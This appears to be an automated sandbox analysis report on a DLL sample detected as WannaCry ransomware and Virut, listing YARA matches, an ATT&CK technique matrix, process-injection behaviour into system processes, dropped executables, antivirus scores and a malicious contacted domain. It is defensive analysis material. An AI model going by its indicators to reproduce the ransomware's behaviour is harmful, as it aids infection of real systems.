              Source: Yara matchFile source: 0000000F.00000000.300842077.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.667969815.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.785185973.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000002.784853909.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000023.00000002.785122913.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000023.00000000.411115059.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000000.280492982.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000020.00000002.785080117.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000000.296737411.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: mssecsvc.exe PID: 6408, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: winlogon.exe PID: 572, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: lsass.exe PID: 612, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: mssecsvc.exe PID: 6580, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: fontdrvhost.exe PID: 708, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: fontdrvhost.exe PID: 716, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 724, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 804, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 852, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 900, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dwm.exe PID: 984, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1020, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 316, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 416, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 948, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 960, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected Virut
              Source: Yara matchFile source: 11.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000018.00000000.314054124.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.784858800.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.784858660.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.388703492.0000000000A80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.785329108.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001F.00000000.384952230.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000025.00000000.427531330.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000021.00000000.392931300.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.784858398.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000000.283233215.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.665288410.0000000000A6B000.00000040.00000001.01000000.00000004.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.785379244.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000000.275433265.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000000.302543511.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000026.00000000.431362516.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000000.298581179.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000000.297399320.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000000.300859546.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000025.00000002.785172242.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000000.321636086.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000000.321813327.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000002.785061929.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000000.319687483.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000002.785023367.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.784858957.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000000.280733139.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000018.00000002.785329413.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001F.00000002.785042903.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.784832443.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000027.00000000.435545169.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000000.321645741.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000021.00000002.785141452.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.785409783.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000000.280760913.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000000.302520549.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000000.298527592.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000000.321842635.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000000.270789242.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.665390921.0000000000B90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000022.00000002.785106286.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000018.00000000.310448882.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.388561725.0000000000A6B000.00000040.00000001.01000000.00000004.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000000.319657354.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000002.785307990.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000000.296758568.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000026.00000002.785177108.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000000.290186231.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000020.00000000.389181031.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000018.00000002.784858725.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000022.00000000.407443351.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000000.300842077.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.667969815.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.785185973.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000002.784853909.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000023.00000002.785122913.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000023.00000000.411115059.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000000.280492982.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000020.00000002.785080117.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000000.296737411.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: mssecsvc.exe PID: 6408, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: winlogon.exe PID: 572, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: lsass.exe PID: 612, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: mssecsvc.exe PID: 6580, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: fontdrvhost.exe PID: 708, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: fontdrvhost.exe PID: 716, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 724, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 804, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 852, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 900, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dwm.exe PID: 984, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1020, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 316, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 416, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 948, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 960, type: MEMORYSTR

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid Accounts1
              Windows Management Instrumentation              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		1
              Disable or Modify Tools              		1
              Input Capture              		11
              System Time Discovery              		Remote Services1
              Archive Collected Data              		Exfiltration Over Other Network Medium12
              Ingress Tool Transfer              		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
              Data Encrypted for Impact
              Default Accounts12
              Native API              		4
              Windows Service              		4
              Windows Service              		1
              Obfuscated Files or Information              		LSASS Memory123
              System Information Discovery              		Remote Desktop Protocol1
              Input Capture              		Exfiltration Over Bluetooth2
              Encrypted Channel              		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain Accounts2
              Command and Scripting Interpreter              		Logon Script (Windows)412
              Process Injection              		1
              Software Packing              		Security Account Manager371
              Security Software Discovery              		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
              Non-Application Layer Protocol              		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local Accounts2
              Service Execution              		Logon Script (Mac)Logon Script (Mac)1
              DLL Side-Loading              		NTDS31
              Virtualization/Sandbox Evasion              		Distributed Component Object ModelInput CaptureScheduled Transfer2
              Application Layer Protocol              		SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script121
              Masquerading              		LSA Secrets3
              Process Discovery              		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.common31
              Virtualization/Sandbox Evasion              		Cached Domain Credentials1
              Remote System Discovery              		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup Items412
              Process Injection              		DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
              Rundll32              		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 signatures2 2 Behavior Graph ID: 670186 Sample: FjYNZSPNkt Startdate: 20/07/2022 Architecture: WINDOWS Score: 100 72 Tries to download HTTP data from a sinkholed server 2->72 74 Snort IDS alert for network traffic 2->74 76 Multi AV Scanner detection for domain / URL 2->76 78 9 other signatures 2->78 10 loaddll32.exe 1 2->10         started        12 mssecsvc.exe 2->12         started        15 svchost.exe 2->15         started        17 9 other processes 2->17 process3 dnsIp4 20 cmd.exe 1 10->20         started        22 rundll32.exe 10->22         started        25 rundll32.exe 1 10->25         started        94 Maps a DLL or memory area into another process 12->94 96 Changes security center settings (notifications, updates, antivirus, firewall) 15->96 60 127.0.0.1 unknown unknown 17->60 signatures5 process6 file7 28 rundll32.exe 20->28         started        90 Drops executables to the windows directory (C:\Windows) and starts them 22->90 30 mssecsvc.exe 7 22->30         started        56 C:\Windows\mssecsvc.exe, PE32 25->56 dropped signatures8 process9 dnsIp10 35 mssecsvc.exe 7 28->35         started        66 www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com 104.16.173.80, 49756, 80 CLOUDFLARENETUS United States 30->66 58 C:\Windows\tasksche.exe, PE32 30->58 dropped 68 Drops executables to the windows directory (C:\Windows) and starts them 30->68 39 tasksche.exe 30->39         started        file11 70 Tries to resolve many domain names, but no domain seems valid 66->70 signatures12 process13 dnsIp14 62 104.17.244.81, 49792, 80 CLOUDFLARENETUS United States 35->62 64 www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com 35->64 80 Antivirus detection for dropped file 35->80 82 Multi AV Scanner detection for dropped file 35->82 84 Machine Learning detection for dropped file 35->84 88 6 other signatures 35->88 41 lsass.exe 35->41 injected 44 svchost.exe 35->44 injected 46 winlogon.exe 35->46 injected 48 14 other processes 35->48 86 Detected Wannacry Ransomware 39->86 signatures15 process16 signatures17 92 Writes to foreign memory regions 41->92 50 backgroundTaskHost.exe 41->50 injected 52 BackgroundTransferHost.exe 13 44->52         started        54 backgroundTaskHost.exe 191 162 44->54         started        process18

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              FjYNZSPNkt.dll86%VirustotalBrowse
              FjYNZSPNkt.dll78%MetadefenderBrowse
              FjYNZSPNkt.dll96%ReversingLabsWin32.Ransomware.WannaCry
              FjYNZSPNkt.dll100%AviraW32/Virut.Gen
              FjYNZSPNkt.dll100%Joe Sandbox ML

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Windows\mssecsvc.exe100%AviraW32/Virut.Gen
              C:\Windows\tasksche.exe100%AviraTR/FileCoder.AU
              C:\Windows\mssecsvc.exe100%Joe Sandbox ML
              C:\Windows\tasksche.exe100%Joe Sandbox ML
              C:\Windows\mssecsvc.exe97%ReversingLabsWin32.Ransomware.WannaCry
              C:\Windows\tasksche.exe85%MetadefenderBrowse
              C:\Windows\tasksche.exe95%ReversingLabsWin32.Ransomware.WannaCry

              Unpacked PE Files

              SourceDetectionScannerLabelLinkDownload
              4.0.mssecsvc.exe.400000.6.unpack100%AviraW32/Virut.GenDownload File
              4.2.mssecsvc.exe.7100a4.1.unpack100%AviraTR/FileCoder.AUDownload File
              29.0.tasksche.exe.400000.0.unpack100%AviraTR/FileCoder.AUDownload File
              6.0.mssecsvc.exe.7100a4.5.unpack100%AviraTR/FileCoder.AUDownload File
              6.0.mssecsvc.exe.7100a4.1.unpack100%AviraTR/FileCoder.AUDownload File
              11.0.mssecsvc.exe.7100a4.1.unpack100%AviraTR/FileCoder.AUDownload File
              4.2.mssecsvc.exe.400000.0.unpack100%AviraW32/Virut.GenDownload File
              4.0.mssecsvc.exe.400000.0.unpack100%AviraW32/Virut.GenDownload File
              6.2.mssecsvc.exe.400000.0.unpack100%AviraW32/Virut.GenDownload File
              4.0.mssecsvc.exe.400000.2.unpack100%AviraW32/Virut.GenDownload File
              4.0.mssecsvc.exe.400000.4.unpack100%AviraW32/Virut.GenDownload File
              4.0.mssecsvc.exe.7100a4.5.unpack100%AviraTR/FileCoder.AUDownload File
              6.0.mssecsvc.exe.7100a4.7.unpack100%AviraTR/FileCoder.AUDownload File
              6.0.mssecsvc.exe.400000.2.unpack100%AviraW32/Virut.GenDownload File
              4.0.mssecsvc.exe.7100a4.7.unpack100%AviraTR/FileCoder.AUDownload File
              4.0.mssecsvc.exe.7100a4.1.unpack100%AviraTR/FileCoder.AUDownload File
              11.2.mssecsvc.exe.400000.0.unpack100%AviraW32/Virut.GenDownload File
              6.0.mssecsvc.exe.7100a4.3.unpack100%AviraTR/FileCoder.AUDownload File
              29.2.tasksche.exe.400000.0.unpack100%AviraTR/FileCoder.AUDownload File
              6.0.mssecsvc.exe.400000.0.unpack100%AviraW32/Virut.GenDownload File
              6.2.mssecsvc.exe.7100a4.1.unpack100%AviraTR/FileCoder.AUDownload File
              4.0.mssecsvc.exe.7100a4.3.unpack100%AviraTR/FileCoder.AUDownload File
              6.0.mssecsvc.exe.400000.4.unpack100%AviraW32/Virut.GenDownload File
              11.0.mssecsvc.exe.400000.0.unpack100%AviraW32/Virut.GenDownload File
              11.2.mssecsvc.exe.7100a4.1.unpack100%AviraTR/FileCoder.AUDownload File
              6.0.mssecsvc.exe.400000.6.unpack100%AviraW32/Virut.GenDownload File

              Domains

              SourceDetectionScannerLabelLink
              www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com12%VirustotalBrowse
              dual-a-0001.a-msedge.net0%VirustotalBrowse

              URLs

              SourceDetectionScannerLabelLink
              http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/100%URL Reputationmalware
              https://www.bing.c0%Avira URL Cloudsafe
              https://ris.a0%Avira URL Cloudsafe
              http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/x100%Avira URL Cloudmalware
              http://pki.goog/repo/certs/gtsr1.der040%URL Reputationsafe
              http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com100%URL Reputationmalware
              https://ris.api8.0%Avira URL Cloudsafe
              http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/l100%Avira URL Cloudmalware
              https://www.bing.cpi/v0%Avira URL Cloudsafe
              https://ris.api.iris.micr0%Avira URL Cloudsafe
              http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/22www.iuqerfsodp9ifjaposdfjhgosurijfaewrwer100%Avira URL Cloudmalware
              http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comC0%Avira URL Cloudsafe
              http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comJ0%URL Reputationsafe
              https://store-images.s-micros0%Avira URL Cloudsafe
              http://crl.ver)0%Avira URL Cloudsafe
              http://crl.pki.goog/gtsr1/gtsr1.crl0W0%URL Reputationsafe
              https://pki.goog/repository/00%URL Reputationsafe
              https://%s.xboxlive.com0%URL Reputationsafe
              https://ris.iris.mi0%Avira URL Cloudsafe
              https://dynamic.t0%URL Reputationsafe
              https://www.kryptoslogic.com0%URL Reputationsafe
              https://arc.msn.coP0%Avira URL Cloudsafe
              https://%s.dnet.xboxlive.com0%URL Reputationsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
              		104.16.173.80
              		truetrueunknown
              dual-a-0001.a-msedge.net
              		204.79.197.200
              		truefalseunknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/true
              • URL Reputation: malware
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              https://dev.ditu.live.com/REST/v1/Routes/svchost.exe, 00000014.00000002.328766521.000001C91F63C000.00000004.00000020.00020000.00000000.sdmpfalse
                		high
                https://dev.virtualearth.net/REST/v1/Routes/Drivingsvchost.exe, 00000014.00000003.325617470.000001C91F65F000.00000004.00000020.00020000.00000000.sdmpfalse
                  		high
                  https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashxsvchost.exe, 00000014.00000002.328766521.000001C91F63C000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    https://www.bing.cbackgroundTaskHost.exe, 0000001C.00000000.356343583.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.342288131.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.360482512.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.351846295.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.347247275.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.387936226.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.383393856.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.370724756.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.392409764.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.378513051.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.365406036.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://t0.tiles.ditu.live.com/tiles/gensvchost.exe, 00000014.00000003.325657488.000001C91F648000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.329211076.000001C91F64F000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      https://ris.abackgroundTaskHost.exe, 00000024.00000003.530398223.000001D4241D8000.00000004.00000020.00020000.00000000.sdmp, backgroundTaskHost.exe, 00000024.00000003.565308249.000001D426696000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://dev.virtualearth.net/REST/v1/Routes/Walkingsvchost.exe, 00000014.00000003.325617470.000001C91F65F000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        http://schema.org/reminderperbackgroundTaskHost.exe, 0000001C.00000000.356343583.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.342288131.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.360482512.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.351846295.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.347247275.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.387936226.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.383393856.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.370724756.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.392409764.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.378513051.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000002.528374745.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmp, backgroundTaskHost.exe, 0000001C.00000000.365406036.0000019B7B67C000.00000004.00000001.00020000.00000000.sdmpfalse
                          		high
                          https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=svchost.exe, 00000014.00000002.328783143.000001C91F642000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.325819454.000001C91F641000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.325767665.000001C91F640000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/xmssecsvc.exe, 00000006.00000002.361347885.0000000000D87000.00000004.00000020.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            https://dev.ditu.live.com/mapcontrol/logging.ashxsvchost.exe, 00000014.00000003.325617470.000001C91F65F000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              http://pki.goog/repo/certs/gtsr1.der04lsass.exe, 00000009.00000000.276000241.00000240B2694000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.799419871.00000240B26AA000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.285841175.00000240B2694000.00000004.00000001.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://dev.ditu.live.com/REST/v1/Imagery/Copyright/svchost.exe, 00000014.00000003.325716393.000001C91F659000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.329272939.000001C91F65A000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.commssecsvc.exe, 0000000B.00000000.278777531.000000000040F000.00000008.00000001.01000000.00000004.sdmptrue
                                • URL Reputation: malware
                                		unknown
                                https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=svchost.exe, 00000014.00000003.325767665.000001C91F640000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://ris.api8.backgroundTaskHost.exe, 00000024.00000003.530398223.000001D4241D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://dev.virtualearth.net/REST/v1/Transit/Schedules/svchost.exe, 00000014.00000002.328783143.000001C91F642000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.325819454.000001C91F641000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.325767665.000001C91F640000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/lmssecsvc.exe, 00000006.00000002.361347885.0000000000D87000.00000004.00000020.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    		unknown
